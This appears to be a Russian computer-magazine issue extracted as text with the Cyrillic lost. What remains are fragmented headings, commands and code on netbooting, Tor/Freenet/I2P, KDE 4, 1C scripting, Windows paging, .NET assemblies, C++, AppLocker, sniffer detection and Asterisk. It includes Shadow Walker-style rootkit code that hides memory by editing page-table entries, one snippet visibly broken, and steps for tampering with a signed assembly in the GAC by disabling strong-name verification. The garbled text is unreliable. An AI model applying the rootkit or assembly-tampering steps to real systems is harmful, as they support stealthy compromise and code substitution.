Ubuntu Karmic (9.10) x86 rescue.
Smart Boot Manager.
,
nethack boot.kernel.org.
boot.kernel.org ( BKO)
netboot.me .
gPXE , :
Debian live.
Ubuntu 9.04.
Damn Small Linux.
Knoppix 5.0.1.
Fedora 11 Live CD.
: , LiveCD,
.



, netboot.me

. initrd
( ) -
, netboot.me
( ,
google ),
MY CONFIGS, new. , ,
X 01 /133/ 10

Kernel/Image, initrd Initrd


Args.
, ,
Chainload URL , ID ,
. netboot.
me
Press any key for options or wait n seconds.
Boot a configuration directly ID
.
netboot.me, boot.kernel.org ,
. ,
. .
, git nasm:
$ sudo apt-get install build-essential gitcore nasm

WARNING

warning
Gujin
,

(*.bdi) ISO- / /
boot.


,
--bootdir=/
//

.

BKO:
$ git clone git://git.etherboot.org/scm/
people/pravin/BKO.git
$ cd BKO
$ git submodule init
$ git submodule update

config ,
BASE_URL URL, BKO ( gpxe), ISO_LOCATION_
LOCAL URL ISO- (
BASE_URL/ISO).
gpxe
BKO:
$ make
$ cd install_help
$ ./configure_BKO.sh

initramfs ISO-:
$ ./download_initramfs_images_http.sh
$ ./download_ISO.sh

, BKO
- (, /var/www)
.z

087

UNIXOID
zobnin@gmail.com


, . -, , , -, , ,
, - . , ?
-
ANONYMOUSE.ORG


-,
IP-
IP- .

088

,
,
( , ,
,
).
IP- ,
-,

,
. ,
.
-,
, , . , , ,
X 01 /133/ 10

FREENET

-,
, ( , ).
e-mail
,
SMTP-,
, , .
(bouncer, bnc)
IP- IRC. ,
,
-:
.

,
.


Tor,

, ,
, X 01 /133/ 10


.
Tor (Onion
Routing),
90- . ,

, ,

()
.
: , ,
Tor-, Tor-.
(
),
.

Tor-,

, Tor-,
.
,
Tor-.
,
Tor-
, .
.
, ,
.
, .
, ,
, ,
.
Tor,
, (
). , Tor , ,

, ,
.
,
.

Tor-,
.

.

.
Tor-, DNS-, ,
Tor-,
DNS-, , .
,
Tor Privoxy,
DNS-,
OpenDNS TorDNS.


. , , JavaScript-, . JavaScript ,
- Privoxy
Firefox- Torbutton.
Tor
.
Tor- HTTP- Privoxy,
HTTP- Tor.

089

UNIXOID

Torchat Python - ,

python2.5, python-wxgtk2.8 torchat.
py, .

Freenet
Ubuntu Tor- ,
. /etc/
apt/sources.list :
deb http://deb.torproject.org/
torproject.org karmic main

:
$ gpg --keyserver keys.gnupg.net
--recv 886DDD89
$ gpg --export A3C4F0F979CAA22CDBA8
F512EE8CBC9E886DDD89 | sudo apt-key
add -

apt- :
$ sudo apt-get update
$ sudo apt-get install tor torgeoipdb privoxy

Privoxy
:
forward-socks4a / 127.0.0.1:9050 .

,
Tor
. https://
check.torproject.org Tor. .
Tor
Privoxy (localhost:8118)
SOCKS- Tor (localhost:9050) . ,
wget, lynx, apt ,
Tor, ~/.bashrc :
export http_
proxy=http://127.0.0.1:8118/
export HTTP_PROXY=$http_proxy

SOCKS SSH Tor,


socat:
$ sudo apt-get install socat

SSH (~/.ssh/config)
:
Host *
ProxyCommand socat STDIO SOCKS4A:12
7.0.0.1:%h:%p,socksport=9050

Privoxy:
$ sudo /etc/init.d/privoxy start

Torbutton Firefox.
https://addons.
mozilla.org/firefox/2275/
apt:
$ sudo apt-get install torbuttonextension

090

Tor
, ,
-
.
Torchat (https://code.
google.com/p/torchat/), Tor,
.

Onion Routing (
Mix network)

Mixminion
(http://mixminion.net).
,
,

, ,
.
mixminion
email-
, .
,

.
:

28 ,
, .



Freenet (http://freenetproject.org)
(Ian Clarke), 1999
A Distributed, Decentralised
Information Storage and Retrieval System

,
.
Freenet
, ,

.
Tor, Freenet
,
.
Freenet
,
,
. , , , .
,
.
: , Freenet,

- .
Freenet
,
- ( SHA-1)
X 01 /133/ 10

INFO

info

I2P

Freenet,
,
. , ,
,

.
. ( Freenet
), ,
, ,
.
,
.
, ,
.

,
, .
, ( ).
Freenet .
,
:
* Frost ,
,
Freenet, .
* jSite
, , Freenet-.
* Thaw .
* freemulet , .
* Freemail .

, -
Freenet X 01 /133/ 10

.
Freenet- ,
IM-.
Freenet Java,
:
$ sudo apt-get install sun-java6-jre
$ sudo update-java-alternatives -s java-6-sun

:
$ wget http://downloads.freenetproject.org/
alpha/installer/new_installer.jar
$ java -jar new_installer.jar

. Freenet ( ,

run.sh) , Web, .
http://127.0.0.1:8888. FProxy, Freenet- Freenet.
Freenet-. Freenet-
http://127.0.0.1:8888/config/.
,
.

Tor
,


13- USENIX , 13
2004 .

BSD.
Vidalia TorK

Tor,
Qt4.
Tor



-.
Tor
( .onion),

, .


Freenet
,
TCP/
IP- . I2P (Invisible
Internet Project/Protocol) ,
,
Freenet .
Freenet, I2P
. Tor,
I2P Freenet. , I2P
TCP/IP ,

DVD
dvd


LiveCD
Incognito.

091

UNIXOID
ADEPT ADEPTG@GMAIL.COM

I2P
, (
I2P Tor).
I2P , .

( I2P),
-,
- .

(,
),
, ,
IP-,
.
10 .
I2P
,

-. ,
Freenet-. ,
I2P, :
* I2PSnark I2P. .
* I2P-BT BitTorrent
3.4.2 I2P.
* I2PRufus Rufus I2P.

092

* I2Phex gnutella- Phex


I2P.
* iMule eMule I2P.
* Susimail
I2P.
* Syndie .

, ,
Azureus,
I2P.
Freenet, I2P
Java .

:
$ wget http://mirror.i2p2.de/
i2pinstall-0.7.7.exe
$ java -jar ./i2p_install-0.7.7.exe

, ,
, .

:
$ ./i2prouter start


: http://127.0.0.1:7657/index.jsp.

HTTP-: 127.0.0.1:4444.
I2P .i2p,
orion.i2p, :
search.i2p eepsites.i2p.
,
. , http://orion.i2p/hosts.
txt (http://
localhost:7657/susidns/subscriptions.jsp).


LiveCD Incognito (www.anonymityanywhere.com/
incognito/) .
,
.
Tor,
Firefox Torbutton.
, SOCKS HTTP-, . :
* Firefox + Tor + Torbutton WWW.
* TrueCrypt
.
* Enigmail Thunderbird-
.
X 01 /133/ 10

Tor

* FireGPG Firefox, ,
Web.
* GnuPG OpenPGP.
* KeePassX .
* Miminion .

USB . , . MAC-
.


,
. :
* -
* Bruteforce-
*

-
.


,
.
Bruteforce- , . , -
.
X 01 /133/ 10

Torbutton

/ .

.
.
,
. ,
.
Freenet I2P,
. Tor, ,
(), ,
(
). z

093

UNIXOID
zobnin@gmail.com

KDE
7 KDE 4
KDE 4 7 ,
KDE (Pillars of KDE), . , KDE 4 ,
.
, 7 KDE 4:
Solid API
.
Phonon API.
Decibel API
.
Akonadi PIM.
Nepomuk .
Plasma .
Oxygen .

SOLID
KDE 4 ,
BSD Windows.


,
.
KDE 4, ,
Solid API.

094

Solid
,
API
.
Solid HAL ,
,
, HAL, NetworkManager BlueZ.

, Solid,
.
Solid
. KDE 4 .
NetworkManager, KDE
.

,
.

, ,
.

PHONON
aRts KDE 2 API,

,
( Linux,
BSD
).
aRts KDE KDE 3, - ,

, KDE 4
- Phonon.
aRts, Phonon
, ,
, X 03 /134/ 10

DECIBEL


(, Skype
, Kopete
),
(,
Phonon,
), Solid
(,
USB- Phonon
Skype ).
Phonon . API , , API
. , Phonon API
C++
( aRts 30):

media = new MediaObject(this);


connect(media, SIGNAL(finished()),
SLOT(slotFinished()));
media->setCurrentSource("/home/
username/music/filename.ogg");
media->play();

Phonon ,
, ,
Xine GStreamer UNIX-
DirectShow Windows
(
,
).

, , , , .
. KDE 4, ,
,
.
KDE 2002, 7 , IT-. , , .
(Kicker, Kdesktop, aRts) KDE 2 ,
, , . ,
SuperKaramba, , , . ,
, .
, , , . KDE 3 , ,
.
KDE 4 , .
.
KDE 4 ,
GNOME ( 2.30, , , KDE 4.0),
2 ,
.
turbina (v.turbina@gmail.com), , z 2008 .

X 03 /134/ 10

KDE 4
, , IP- (VoIP),
(IRC, ICQ, Jabber).
Decibel Telepathy API (
freedesktop.org)
Tapioca. ,
.
KDE 4, , ( )
Decibel.
Decibel , ,

, ,
.

AKONADI
KDE 3 ,
,
,
. Kmail, Kontact , ,

, ,
,


, , . KDE
4
,
Akonadi.
, Akonadi PIM (Personal Information Management,
),
- ,
,
,
.
Akonadi , ,
,
, ,

,
, API
, . Akonadi
,

.
, Akonadi
:
, ,

,
.

095

UNIXOID

KDE 4.4

Desktop File Indexer.


Advanced Settings,
.
Apply Strigi
.
KRunner
.

PLASMA

Akonadi

NEPOMUK
NEPOMUK (Networked Environment for
Personalized, Ontology-based Management of
Unified Knowledge,
) ,
, nepomuk.semanticdesktop.org
KDE .
KDE 4
.


,
Nepomuk
, ,

. ,

,

.
, KDE-
Nepomuk Strigi,
(,
mp3-). ,
, ,
Dolphin ( ,

, ,
). ,
,
,
KRunner (Alt+F2).
Nepomuk
.
, (System Settings),
Advanced, Desktop
Search Enable
Nepomuk Semantic Desktop Enable Strigi

PLASMA
, C++, JavaScript, Ruby Python
Google Gadgets
SuperKaramba
QEdje, Edje E17
Mac OS X
- HTML JavaScript

096

KDE 1
KDE.
. KDE 2

, :
,
, ,
, ,
. KDE 3 SuperKaramba
KDE, .

,
.

. .

C++.
KDE 4
KDesktop, Kicker SuperKaramba ,
Plasma.
Plasma
, , , , .
, Plasma
KDE 4
API .
, Plasma , .
Plasma
X 03 /134/ 10

nepomuk

Plasma : Plasma :

,
, , ..,
, , . Plasma
: , , , ,
, (
,
).
, ,
, - , ,
( ),
KDE 4, ,
,
, , , ,
, .
Plasma Kross,
KDE C++, JavaScript, Ruby Python.
, Plasma ,
,
Plasma Google
Mac OS X (, ,

).
Plasma . KDE
4
.
- ,
..
.
,

Plasma
. ,
Plasma-Netbook
. ,
, ,
.
, Google Summer of Code (Alessandro Diaferia)
, Plasma.
Plasma
.
,
, Plasma KDE 4
: activity. X 03 /134/ 10

KDE 4 - . , ,
-
, , , ,
, ..
KDE ,
.
, , ,
, ,

.
, ,
.

Zoom Out.

, Add Activity. . Zoom In
, . .

Zoom In Zoom Out ,

. Zoom Out, Configure
Plasma Different activity for
each desktop.

INFO

info

KDE, ,

.
, KDE 4.5
.

Phonon

KDE 4.0 2008-.

Qt 4.4.

OXYGEN
Oxygen KDE 4, , , . : Oxygen
KDE 4,
Qt4-, , Plasma,
, .. Oxygen ()
,
KDE 4.

, KDE 4 ,
. ,
.
,
, KDE 4.8
,
KDE 4.3. z

097

CODING

antonov.igor.khv@gmail.com,
ALEKSANDR-EHKKERT@RAMBLER.RU
www.vr-online.ru

1:

-
1: .
.
/
. ( 1) .
X- ?
098

X 03 /134/ 10

, 1:,
, ,
. , , 1:
: 7.7, 8.x. ,
.
7.7 . ,
. . . ,
,
. .
, ,
.
1: , / ( ). ,
7.7 -
. , .
.
,
,
.
,
, .

Delphi, Visual C++.
. ? ,

.
, DLL . ,
WinAPI-,
99% ,
, .
8 .
, .
,
1: 8
WinAPI-. ,
. ?, .
: . , : FTP, HTTP, XML,
SMTP, POP3 . . ,
?

1:

, .
, ,
. - 1? ,
, 1:,
. .
: ,
..
1: .
,
. ,
1: !
X 03 /134/ 10

FTP-

SMTP- -?

- .

1:
#, Python, Delphi . . ,
.
, .
, .
1:
. .
-,
.
.
/: ,
.

,
1:, ,
, .

1: .
/
.

,
. var

099

CODING

(
). .
.
. :
= "Hello, world!";
//
= 0;
//
= (); //

1: . :
//
()

//
(1, 2)

//
(1, 2)
1 + 2;

.
. :
// . while..do
//
// 1 9
//
= 1;
<> 10
();

100

1:

= +1;
;
// .
//for..to..do
// 1 10
//
= 1 10
();
;
// .
//foreach
//
= (2);
[0] = 1;
[1] = 2;

();
;
X 03 /134/ 10

>> coding

SMTP-

,
, 1::
//
//"....|.
// "IF..THEN..ELSE"
// .
= 5;
( = 1)
(" ");
( = 2)
(" ");

(" ");
;
X 03 /134/ 10

1: :). , , .
.
.

FTP-

FTP- . , MS Office,
? ,
(, )? ,
FTP-. WWW, , FTP, POP3, SMTP,
. .
FTP-. , ,
.

101

CODING

, 1:
.
, IDE,
.
. .
1: FTP
: FTP. .
PROXY-, / . . , . ,
:
FTP- 1:
= "";
= "";
= " ";
= " ";

FTP = FTP(,
, , );
FTP.(
);

(" FTP
| !",
.);
(());
;
;

FTP.(
..,
.1.);

(" !",
.);


http://infostart.ru/public/20144 ICQ-,
. C#
.NET- IcqSharp 0.4.0.0.
1?
!
http://infostart.ru/public/14457
. ,

.
http://infostart.ru/public/20223

1: 8.x. ,
-.
http://infostart.ru/public/16332 ,
. ,
FTP-, , , , .
1: .
?

102

(());
;

FTP
FTP.
:
FTP- ()
FTP- ()
FTP-

, PROXY- ()
()
, FTP- .
. , ().
().
FTP-. ,
.....
, , .

FTP- 1: ,
. ,
. , ,
1:, ,
. /
. (.
).

1: , , .
, , .
:
, , ..
( , ), .
, .
,
.
. , , ,
.
smtp-
( ).
. / .

.
.
. . , ,
.

RSS- .
.
Google Reader,
.
1:,
.
RSS- XML-. , , XML . ,
X 03 /134/ 10

>> coding

RSS-
= RSS.selectSingleNode(
"//channel/description").Text;
= RSS.selectNodes("//item");
= 0 .length-1
= .item().childNodes;


= ;
. =
..;
. =
..;
.. =
..;

= ();
2 = 0 .length-1
.
(.item(2).nodeName,
.item(2).text);
;
= ": ";
(.("title"))
= +
.title;
;

= ..();
. =
..;
= ..();
. =
.;
. = ;
(
(..))
..(
..);
;

= " : ";
(.("pubDate"))
= +
RFC822(.pubDate);
;
= " : ";
(.(link))
= + .link;
;

//
= ;
.SMTP =
..;
.SMTP =
..;
.SMTP =
SMTP.;
.SMTP =
..;
= ;

= " : ";
(.("description"))

= +
.description;
;
("--------------------------");
();
();
();
();
("--------------------------");
;

RSS-. Delphi.
XML COM- Microsoft.XMLHTTP.
, 1:
. RSS- .

OUTRO

, ,
, 1:.
, . , X 03 /134/ 10

.();

(" !
: " + (),
.);
;
;
//

.();
(" !",
.);

(" !" +
(),
.);
;
.();

, ,
. ! z

103

CODING
stannic.man@gmail.com

WINDOWS
-


.
32- 4
. 64- ,
,
.

,

(
). ,
, Windows.
,

.

, ?


, , Windows, . ,
Windows :
1) 4
2)
, , .

104

?
( ,
4 , 4 ), (
, 1
).
,

.

,

.

,
.

(page frames),

(paging).
. ,

,
, (
)
. , -
,
- .
, ,
( ): ,
.

, ,
,
,
( )
? ! ,
, !
X 03 /134/ 10

PTE
0xe4321000
CR3

PT

PD
0x321

0x300
0x390

GetPteAddress:
Oxe4321000
=>0xc0390c84

PTE

1100 0000 0011 1001 0000 1100 1000 0100


PTE
-, .

, ,

. (
), ,
.
: (Page Directory, PDE),
(Page Table, PTE)
(Page Frame). ,
,
INTEL ;
www.intel.com
.
PDE
PTE? !

PTE: ((PTE*)(((((ULONG)(VirtualAddress))
>> 12) << 2) + PteBaseAddress)), PteBaseAddress
0xC0000000. ,
PTE: = ( VirtualAddress >> 10)+0xc0000000.
,
PTE :
VirtualAddress = PTE << 10.
, , . ,
32- : 1100000000.0000000101.0000001001.00
b ( ). ,
PTE 1001b 101b.
, , ,
X 03 /134/ 10

HTTP://WWW
links

-
Windows?
gr8.cih.ms/index.
php?entry=entry008


wasm.ru
Great .


Windows,
, www.informit.
com/articles/article.
aspx?p=167857.

INFO
. Mm*.
WriteProcessMemory
ReadProcessMemory, . ,
MmGetPhysicalAddress
, , .
MmIsAddressValid() - ,
, ..
Page Fault
. ,
FALSE.
MmIsNonPagedSystemAddressValid,
MmIsAddressValid ,
. , /
, ,
. !

,
,
!

info


!

DVD
dvd

,


.
Shadow Walker
.


, () .

#PF Page Fault ,
( )

.

. !

Windows . ?
, (
) , -

105

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

#PF #GP
NtQuerySystemInformation
c SystemModuleInformation
\Driver ZwQueryDirectoryObject.

PsLoadedModuleList ( , , ).


PsLoadedModuleList.
Shadow Walker
.

, Shadow Walker
FU. ,
,
.
INT0E
,
,
#PF PageFault.
, ?
(
) , PTE
, Shadow Walker , ,
; , .
,

106

Shadow Walker PTE



. , ,
:
. Shadow Walker
;
, ,
.


VOID MarkPageNotPresent(
PPTE pPte )
{
__asm
{
mov eax, pPte
and dword ptr [eax], 0xFFFFFFFE
}
}

,



. ? ,
,
,
. Shadow Walker ;

http://
www.ht-group.net/32, .

,
,
. ,
,
KeAttachProcess. , ,
. ,
, ,
, ZwWriteProcessMemory, z
. !
-
,

. ( ,
!),

, ;
PTE
!
,

, !
:
X 03 /134/ 10

>> coding



.
?
PTE
DWORD ChangePTEOfTarget(DWORD VirtualAddressOfTarget,
DWORD NewVirtualAddress)
{
DWORD vaTargetPTEaddress;
DWORD vaTargetPTE;
DWORD NewVAPTEaddress;
DWORD NewVAPTE;
DWORD source;
source = VirtualAddressOfTarget;
source = source >> 12;
source = source << 2;
vaTargetPTEaddress = 0xC0000000 + source;
vaTargetPTE = *vaTargetPTEaddr;
source = NewVirtualAddress;
source = source >> 12;
source = source << 2;
NewVAPTEaddress = 0xC0000000 + source;
NewVAPTE = *NewVAPTEaddress;
X 03 /134/ 10

__asm cli
vaTargetPTEaddress = source;
__asm sti
return source; }

. , . ,
( !)

.

, ,
, , Windows ,
. , The matrix has you, Neo!.
Windows ,
.
.
! z

107

CODING
ALEXEYBBB@GMAIL.COM

-
z
.NET

.NET. , ,
GAC.
,
.

(
)
. ,
,
.

.
.
,
:
signedLib.dll
namespace signedLib
{
public class sLib
{
public static int GetNumber()
{
return 1;
}
}
}


:
changeKey.exe
namespace changeKey
{

108

class Program
{
static void Main(string[] args)
{
Console.WriteLine(
signedLib.sLib.GetNumber());
Console.ReadLine();
}
}
}

. .NET Reflector [1] Reflexil [2]


IL- (signedLib.dll), GetNumber()
1, 2. 2.
: /
. , ,
, ,
.
,
, GAC
.

GAC

,

.
, ,
.

,
GAC, .
. ,


( .
, :)). , GAC,
.
. GAC , . ,
! ?
:

.
.
, ,
GAC.
sn.exe (, , sn.exe
). ,
signedLib.dll (
). GAC.
gacutil.exe /i D:\projects\
changeKey\signedLib\bin\Release\
signedLib.dll
X 03 /134/ 10


C:\WINDOWS\
ASSEMBLY

changeKey.
exe. , , signedLib.dll ( ,
GAC). changeKey.exe 1.

, . ,
GetNumber() 1, 2.
C:\Windows\assembly
Windows . ,
:


GAC ,

.
dll , sn.exe:

info

subst b: C:\Windows\assembly
sn -Vr C:\Users\Alex\Desktop\signedLib.dll

B.
.Net- GAC_MSIL;
( .dll ).
, , , signedLib.
dll. signedLib.dll .
.NET Reflector
Reflexil (
) .
(
). ,
, .
IL-
, .
Remove Strong Name . (
Register it for verification skipping,
; ,
).
:
, dll;
.
GAC.
.
,
,
( -
).
.NET Reflector ,
( ).
HasPublicKey (

sn.exe ).
, , ,
,
. , GAC,
, ( ). ,
X 03 /134/ 10

INFO

GAC:
gacutil /u signedLib,Version=1.0.0.0,Culture=
neutral,PublicKeyToken=2b1b71846e76146e

:
gacutil /i
C:\Users\Alex\Desktop\signedLib.dll

, gacutil.exe :
Assembly successfully added to the cache

,
GAC. ( ), changeKey.
exe, 1. ,
2!

DVD
dvd


. :
(, );
.
CAG, :
1. dll- C:\Windows\assembly
( subst).
2. .
3. IL- .
4. , 2 ( ).
5. .
6. GAC.
7. .
5-7
. !

. z

109

CODING
deeonis deeonis@gmail.com

C++

++.

, , ,
CPP- .
,
,
INLINE-
.
1

, ,

(backround).
.

110


changeBackround:
PrettyMenu
class PrettyMenu {
public:

void changeBackround(
std::istream& imgSrc);

private:
X
X

0
03
3 // 1
13
34
4 // 1
10
0

Mutex mutex;
Image *bgImage;
int imageChanges;
};
void PrettyMenu::changeBackround(std::istream& imgSrc)
{
lock(&mutex);
delete bgImage;
++imageChanges;
bgImage = new Image(imgSrc);
unlock(&mutex);

, - , ,
, . , ,
, ,
, . ,
. C++
, ,
, bad_alloc.
changeBackround
. -, bgImage ( ). , ,
. -,
changeBackround,
, .
:

, . ,
: .
changeBackround,
new Image(imgSrc), ,
unlok.
,
. .
changeBachround
:
Lock
void PrettyMenu::changeBackround(std::istream& imgSrc)
{
Lock ml(mutex);
delete bgImage;
++imageChanges;
bgImage = new Image(imgSrc);


class PrettyMenu {
public:

std::tr1::shared_ptr<Image> bgImage;

};
void PrettyMenu::changeBackround(std::istream& imgSrc)
{
Lock ml(mutex);
bgImage.reset(new Image(imgSrc));
++imageChanges;
}

; . ,
. ,
, .
, someFunc, f1 f2:

, ,
(
), .
.
new Image(imgSrc) , bgImage
. , imageChanges ,
, . ,
.
:
;
;
.
,
. ,
imgSrc bgImage
. .
, . .
,
.
:
. , X 03 /134/ 10

void someFunc()
void someFunc()
{

f1();
f2();

, f1 f2 ,
someFunc. ,
, .
, f1 , f2 .
someFunc
, f1 , , -
(,
f1 ).

. .
,
.

111

CODING

, .
, , ,
,
.

.
C++. inline , , .
, , ,
, .
, . ,
,
. , ,
, ,
, .
; , , ,
.
inline , ,
, . -
,
:
inline-
class Person {
public:

//
int age() const { return theAge;}

private:
int theAge;
};


class Base {
public:

private:
std::string bm1, bm2;
};
class Derived: public Base {
public:
Derived(){}

private:
std::string dm1, dm2, dm3;
};


, .
. C++ . ,
, ,
. . .
;
.
. , Derived
:
,
Derived::Derived()
{
Base::Base();
try {dm1.std::string::string();}
catch(...) {
Base::~Base();
throw;
}

,
,
. virtual , , inline . ,
, .

.
, , ,
. ,
- :

try {dm2.std::string::string();}
catch(...) {
dm1.std::string::~string();
Base::~Base();
throw;
}
try {dm3.std::string::string();}
catch(...) {
dm2.std::string::~string();
dm1.std::string::~string();
Base::~Base();
throw;
}

inline-
inline void f() {}
void (*pf)() = f;

//
f();
// , ,
pf();


. :

112

, ,
,
, . .

inline-. ,
,
X 03 /134/ 10

. ,
, ,
.
inline,
. ,
,
,
inline.
, ,
, .
, .

: C++, - . ,
, . ,
(,
private), , .
, , .
, C++ - :

#include <string>
#include "date.h"
#include "address.h"
class Person {
public:
Person ( const std::string& name,
const Date& birthday,
const Address& addr);
std::string name() const;
std::string birthDate() const;
std::string address() const;

private:
//
std::string theName;
Date theBirthDate;
Address theAddress;
};

, C++

.
,
C++. :
- . , :
, . ,
, PersonImpl, Person :
-
#include <string>
#include <memory>
X 03 /134/ 10

//
class PersonImpl;
class Date;
class Address;
class Person {
public:
Person ( const std::string& name,
const Date& birthday,
const Address& addr);
std::string name() const;
std::string birthDate() const;
std::string address() const;

private:
std::tr1::shared_ptr<PersonaImpl> pImpl;
};

Person ,
.
Person , .
, , Person, .
- Person
.
, ( ), -.
( ),
:

class Person {
public:
virtual
virtual
virtual
virtual

~Person ();
std::string name() const = 0;
std::string birthDate() const = 0;
std::string address() const = 0;

};

Person,
, .
, -,
,
.
-.
, (, ) .
.
,
, .

. C++ . .
, C++ ,
. z

113

SYN/ACK
urban.prankster martin@synack.ru

,

,
. ,
, , , ,
Windows.
(, , ),
. , .
(GPO) , Windows.
. ,
,
,
. , ,
( -) GPO
.
,
Microsoft c Group Policy
Settings Reference .
Win2k8 GPO Group Policy
Management Console (GPMC.msc) 2.0.
Windows
(Computer Configuration Windows Settings
Security Settings).
, ,
, ,
, , , NAP, IP-
.
.

114

.

.
,
,
, ,
.

(Load and Unload Device)
; ,

. ,


, , .
, , , ,
. ,
.

,
. , :

,
(

). ,
,

, ,
.

Vista Win2k8.

DeviceLock.


.


GPO

(Software Restriction Policies, SRP).

,
WinXP .
: ,
, . : ,
, .
, .
GPO SRP,

X 03 /134/ 10

.
SRP . ,
( )
(New Software
Restriction Policies).
(Unrestricted),
NTFS .
, . , ,

(Disallowed), , . (Basic User), GPO, Vista,
,
, , .
,

(Set as Default). ,
,
. .
. SRP , %SystemRoot% %ProgramFilesDir%.
.
.
4 .
: ( , ),
(, ), ( , , , )
(, Microsoft, Adobe ..). ,
, .
X 03 /134/ 10

. , ,
( ) ,
.

, .
(Enforcement) ,
, SRP DLL
( ). DLL' ,
, ,
. ,
.
.
.

, .
, - ,
/ . , ,
, ( / ) ,
.
.

APPLOCKER SRP
, ,
,
. , ,
. Win7/Win2k8R2
SRP AppLocker. , SRP
, . SRP, Applocker
, : .
AppLocker Security Settings (secpol.
msc) Application ontrol Policies. ,
,
:
Executable Rules exe, com src;
Windows Installer Rules msi msp ;

115

SYN/ACK

INFO

info

,
IM, Skype, P2P

, z 2009
.

Script Rules bat, cmd, js, ps1 vbs .


Default,
GPO.
:
Enforced , ,
, ;
Audit Only ; ,
, .
AppLocker.

Enforcement AppLocker.
Advanced Enable DLL rule
collection, DLL.
SRP,
. ,
( NTFS, ), SRP,
. AppLocker
.
:
Create New Rule (Publisher), (Path, )
(File Hash);
Automatically generate Rules
, ,
(Path/Hash)
;
Create Default Rules .


Windows (%WINDIR%) Program Files
(%PROGRAMFILES%); ,
(BUILTIN\Administrator),
.

Enforced,
, .
.
,
: ,
, , (Action)
.
AppLocker
, ,
,
, .
Exceptions
. Add,
, ,
.
.
, , , ,
AppLocker .
Default Rules
. Create New
Rule
. ,
Allow/Deny
, .
Publisher/Path/File Hash
, ,

PROMISCAN

116

X 03 /134/ 10

, SRP

. AppLocker
. , C:\
soft, %OSDrive%\soft\*.
, : %WINDIR%,
%SYSTEM32%, %PROGRAMFILES%, %REMOVABLE% (CD/
DVD) %HOT% (USB-). , AppLocker,
, .
, ,
Application Identity (AppIDSvc).
Services (services.msc)
(Security Settings System Services).
:
> gpupdate /force


(, SCCM,
,
z 2009 ).

(AppMgmt), , .

NAT'

. , ,
, ( ),
,
.
, -
WiFi . , ,
. , ,

, (+ ).
- NAT
TTL,
IP- TCP/UDP ( NAT
X 03 /134/ 10

TTL WIRESHARK

z #111).
.
Wireshark (wireshark.org) (Windows, Linux, xBSD, Solaris, Mac OS X ..)
. :
(, ,
),
.
- NAT
TTL ( ) IP-.
,
TTL, , Windows 128,
Linux 64 ( 255),
. ,
TTL 63 127 ( ),
NAT (
- NAT).
IP only ip.ttl
, TTL 64 128.
,
,
, ,
.
,
Wireshark .
tshark -D,
TTL .

HTTP://WWW
links
TechNet,

technet.
microsoft.com/enus/windowsserver/
grouppolicy.
Wireshark
wireshark.org.
BWMeter
desksoft.com/
BWMeter.htm.
proDETECT
sf.net/projects/
prodetect.
PromiScan
securityfriday.com/
products/promiscan.
html.

> tshark -i 1 -e ip.ttl -Tfields

tcpdump- ,
IP (ip[8] <
64, TTL 8- IP-).
Wireshark BWMeter
(desksoft.com/BWMeter.htm),
,
.

, .
, : Kerio WinRoute
( -
, z 2007
), UserGate Proxy & Firewall ( -

117

SYN/ACK

PROMQRY MICROSOFT
, z 2009 ), ISA
Server/Forefront TMG (
, z 2009 ) ,
.
,
Nmap (nmap.org)
.

.
, , -,
.

LAN
,
, .

, ,
, ,
.

(promiscuous mode),
, .

,
:

NIC promiscuous mode , ,

118

;

;
,
, ARP- IP
, -.

.
ARP-
:
> arp -s hackerhost
00:11:22:33:44:55
> ping hackerhost

, ,
,
.
:
> arp -d hackerhost

. ,
proDETECT (sf.net/projects/prodetect), , , , .

. e-mail.

PromiScan (securityfriday.
com/products/promiscan.html)
IP
. , ,
. .
, Microsoft

Promqry PromqryUI,
(support.microsoft.com/
kb/892853). ,
GUI. : IP-

Start Query.


, ,
.
,
.
,
LAN;

, ,
- IP-,
, URL
. z
X 03 /134/ 10

Sergey Jaremchuk feat. Andrey Matveev



ASTERISK

-
. IT- : , , , .
, IP-PBX Asterisk
.
,
, . IP-PBX Asterisk,
?
:
,
( IPsec-
),
- .
, VoIP:
, IVR ( ,

call-), GSM- ..

,
IT- (
)
.
, Asterisk.
,
.
Asterisk'a SIP (Session
Initiation Protocol, RFC 3263), IAX2
(Inter-Asterisk eXchange protocol,
VoIP- IP-PBX Asterisk,
RFC 5456). ,
IAX2
- NAT.
(4569/UDP)
X 03 /134/ 10

(..

, ) .

.
,

. ,
SIP, IAX2
, ,
.

iax.conf.

.
$ sudo nano /etc/asterisk/iax.conf
; Asterisk
[general]
;register =>
<username>:<password>@< IP
>
register => userB:password@synack.
ru
;
[synack]
type=friend
user=username
secret=password
host=synack.ru
context=synack


:
$ sudo nano /etc/asterisk/extensions.conf
[synack]
exten => _5XXX,1,NoOp()
exten => _5XXX,n,Dial(IAX2/
synack/${EXTEN})
exten => _5XXX,n,Hangup()

, ,
.
iax.conf . ,
,
register.
$ sudo nano /etc/asterisk/iax.conf
[office]
type=friend
user=user
secret=password
host=dynamic
; IP-
deny=0.0.0.0/0
permit=11.22.33.44
context=office

extensions.conf
:
exten => _8XXX,1,
Dial(IAX2/office/
${EXTEN})

119

SYN/ACK

IP-PBX Asterisk, ,
.
. ,
. , Asterisk
.
, :
exten => 3000,1,GotoIfTime(9:00-18:00|monfri|*|*?OUT,s,1)

, !

SIP-
SIP-, , .
,
. Asterisk ,
SIP- ,
,

-.
,
. ,
SIP'
sipnet.ru.

IAX2. SIP
sip.conf.
$ sudo nano /etc/asterisk/sip.conf
[general]
...
useragent=SipPhone
register=myusername:mypassword@sipnet.ru/2223322
;
disallow=all
allow=ulaw
allow=alaw

120

allow=gsm
[sipnet]
type=friend
username=myusername
secret=mypassword
callerid=sipnet
host=sipnet.ru
nat=yes
fromuser=sipnet
fromdomain=sipnet.ru
dtmfmode=rfc2833
insecure=invite
context=sipnet

SIP. , , FAQ
,
.
:
$ sudo nano /etc/asterisk/extensions.conf
[sipnet-in]
exten => 101,1,Set(CALLERID(name)="Sipnet call")
exten => 101,n,Dial(SIP/101,20)
exten => 101,n,Playback(vm-nobodyavail)
exten => 101,n,Voicemail(101)
exten => 101,n,Hangup()
[sipnet-out-moscow]
exten => _749[59]ZXXXXXX,1,Set(CALLERID(all)="SipPhon
e" <2223322>)
exten => _749[59]ZXXXXXX,n,Dial(SIP/sipnet/${EXTEN},20)
exten => _749[59]ZXXXXXX,n,Hangup()

CALLBACK ,
, . ,
X 03 /134/ 10

A2BILLING

.
?
. :
, ,
- ,
, , ,
..
Asterisk
, . /
var/lib/asterisk/outgoing .call-,
Asterisk
. extensions.conf
:
$ sudo nano /etc/asterisk/extensions.conf
[IncomingCall]
; , ,

